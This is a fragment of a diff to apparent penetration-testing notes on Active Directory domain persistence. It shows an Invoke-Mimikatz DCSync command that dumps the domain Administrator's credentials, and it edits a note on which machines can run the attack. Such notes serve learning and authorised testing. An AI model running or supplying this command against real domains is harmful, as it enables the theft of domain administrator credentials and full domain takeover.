mvc1009/hackingnotes/_docs/active-directory/domain-persistence.md

 ```powershell
 Invoke-Mimikatz -Command '"lsadump::dcsync /user:corp\Administrator"'
 ```
-> **Note** Dcsync attack can be done in every domain computer.
-Command execution on the DC is not needed, but yes Domain Admin privileges.
+> **Note** DCSync attack can be done on any machine even if it is not part of the domain.

 ## Mitigation